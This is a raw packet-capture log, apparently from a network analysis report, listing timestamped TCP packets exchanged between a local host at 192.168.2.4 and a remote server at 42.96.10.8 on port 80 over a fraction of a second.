                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671608925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671613932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671631098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671653986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671657085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671670914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671686888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671704054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671720028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671720028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671720028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671735048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671756983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671761990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671801090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671832085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671840906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671869040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671874046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671890020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671902895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671917915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671922922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671933889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671948910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671964884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671981096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672003031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672003031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672003031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672094107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672108889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672135115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672149897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672167063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672174931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672174931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672183990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672275066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672291994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672308922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672310114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672327042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672348976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672348976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672411919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672439098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672456026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672472954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672498941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672555923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672584057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672599077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672606945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672621965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672647953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672653913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672653913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672653913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672666073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672681093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672696114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672710896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672749996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.672749996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711201906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711218119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711245060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711267948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711292028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711296082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711296082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711309910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711335897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711352110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711353064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711369038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711385012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711391926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711400986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711416960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711437941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711437941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711599112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711740017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711751938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711766958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711782932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711798906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711930037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.711930037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.712357998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.712387085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.712399960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.712424040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.712462902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.712483883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.712501049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.712516069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.712723970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.712738991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.712740898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.712757111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.712784052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.714178085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742207050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742227077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742252111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742269039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742284060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742290020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742300034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742309093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742333889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742348909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742367983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742410898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742410898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742441893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742460966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742511988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742527962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742543936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742567062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742582083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742693901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.742693901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.743338108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.750844002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.750871897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.750888109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.750904083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.750940084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.750948906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.750966072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.751060963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.751060963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.752111912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.752183914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.752197981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.752213001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.752229929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.752244949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.752325058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.752325058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.752325058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.771416903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.771434069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.771450043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.773453951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774295092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774310112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774336100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774350882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774369001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774369001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774369001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774384975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774400949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774424076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774425030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774440050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774447918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774475098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774490118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774528980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774528980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774542093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774593115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774609089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774626970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774638891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774651051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774666071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774668932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774684906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774701118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774717093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774744987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774744987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774753094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774769068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774854898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774854898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774943113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774955988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774969101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774986029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.774997950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775011063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775027037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775039911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775053024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775053024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775053024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775118113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775167942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775183916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775249958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775259972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775259972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775264978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775283098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775296926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775320053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775331974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775348902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775367975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775382996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775403976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775471926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775476933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775501013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775517941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775532007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775547981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775585890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775585890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775593996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775609016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775623083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775654078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775655985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775736094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775753021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775769949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775796890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775796890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775825977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775876045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775892019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775911093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775935888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775949001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775974035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775990963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775990963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.775990963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776007891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776020050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776026964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776051998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776067972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776082039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776098013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776112080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776124954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776124954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776141882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776155949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776182890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776196003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776211023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776215076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776215076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776215076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776227951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776285887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776299953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776314974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776326895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776328087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776334047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776350021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776367903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776372910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776384115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776400089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776410103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776410103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776416063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776443958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776485920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776501894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776518106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776532888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776547909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776563883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776580095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776608944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776623011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776633978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776633978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776633978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776642084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776660919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776678085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.776772022 CET804973342.96.10.8192.168.2.4
